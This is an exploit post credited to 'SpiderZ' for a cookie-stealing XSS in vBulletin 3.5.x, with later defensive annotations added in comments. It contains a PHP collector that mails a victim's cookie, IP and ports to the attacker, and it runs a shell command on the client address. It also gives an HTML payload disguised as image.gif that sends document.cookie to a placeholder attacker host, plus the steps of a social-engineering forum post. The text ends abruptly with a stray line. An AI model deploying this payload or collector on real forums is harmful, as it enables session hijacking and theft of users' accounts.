/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *
| | >< | |
\ \ / /
'.__.'
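=> XSS in vBulletin 3.5.x (tested on 3.5.4): a cookie-theft proof of concept in three parts: a collector script (1), an HTML file named as a GIF (2), and a forum post linking to it (3)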
=> Author: SpiderZ
=> Sito: www.spiderz.tk
( 1 )
Name file: exploit.php
<?php
// Collector script, first fragment: reads the connecting client's address
// from $_SERVER['REMOTE_ADDR'] and echoes it back to that client.
// $ip_adresse is reused further down, where it is interpolated into the
// report mail body ("Ip: ...").
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
// Runtime string, Italian for "your ip is"; the 'и' is presumably a
// mis-encoded 'è'. It is left as found because it is program output.
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
// Runtime string, French for "unable to display the IP".
echo 'Impossible d\'afficher l\'IP';
}
?>
<a href="log.php"></a><?
// The anchor above links to log.php with no link text; log.php itself is
// not shown on this page.
//
// Analyst notes on this fragment:
// - It opens with the short tag and reads $HTTP_SERVER_VARS plus the bare
//   globals $REMOTE_HOST, $REMOTE_ADDR, $PHP_SELF and $REMOTE_PORT. Those
//   only exist with short_open_tag, register_long_arrays and
//   register_globals enabled; the latter two were removed in PHP 5.4, so
//   on a current interpreter these values are undefined.
// - $day, $month, $year, $visitor_info and $x1 are assigned here but not
//   used in the lines shown; only $xx1, $base and $x2 reach the mail body.

// Port the web server accepted the request on.
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
// Prefer the resolved host name, fall back to the address.
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
// URL of this script as the server sees it (scheme hard-coded to http).
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
// NOTE(review): the backtick operator runs a shell command with a variable
// interpolated unescaped. Whether a request can influence that variable
// depends on the register_globals / variables_order configuration, so treat
// the script as unsafe to execute outside an isolated analysis environment.
$x1=`host $REMOTE_ADDR|grep Name`;
// Client-side source port of the connection.
$x2=$REMOTE_PORT;
?>
<?php
// Takes the value of the "c" query parameter as-is, with no validation.
// In part (2) of this page the onmouseover handler appends document.cookie
// to "exploit.php?c=", so this is where the browser-side value arrives.
//
// Defensive notes:
// - Cookies set with the HttpOnly attribute are not exposed through
//   document.cookie and would not appear in this parameter.
// - Part (2) is HTML stored under a .gif name; presumably it depends on the
//   browser rendering that file as HTML (to be confirmed against the
//   affected browser). Serving user-supplied files with their real
//   Content-Type plus "X-Content-Type-Options: nosniff", and validating
//   image content on upload, addresses that class of problem.
// - In proxy or web logs, an outbound GET to a third-party host whose query
//   string carries cookie-shaped name=value pairs is the observable trace.
$cookie = $_GET['c'];
?>
<?php
// Builds a plain-text report and sends it with mail(). It depends on
// variables set by the earlier fragments: $ip_adresse, $cookie, $base,
// $xx1 and $x2.
//
// Triage notes: the subject "Xss Vbulletin" and the body labels below are
// fixed strings, so they can serve as indicators when reviewing a found
// script or a host's outbound mail. The recipient is a placeholder on this
// page, not a real address.
$myemail = "YOUR ADDRESS E-MAIL";
// Human-readable timestamp, e.g. weekday, month, day, year, 12-hour time.
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
// Body labels: "porta usata" is Italian for "port used", "Giorno & Ora"
// for "day & time". The request-supplied $cookie goes into the body only,
// not into a mail header.
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
// Sender and recipient are the same placeholder address.
$from = "From: $myemail\r\n";
// The return value of mail() is not checked, so a delivery failure is silent.
mail($myemail, $subject, $message, $from);
?>
<?php
$myemail = "YOUR ADDRESS E-MAIL";
( 2 )
Name file: image.gif
<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >
location="http://YOUR ADDRESS WEB.com
( 3 )
1° new thread
2° <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> '
3° Submit
4° It waits for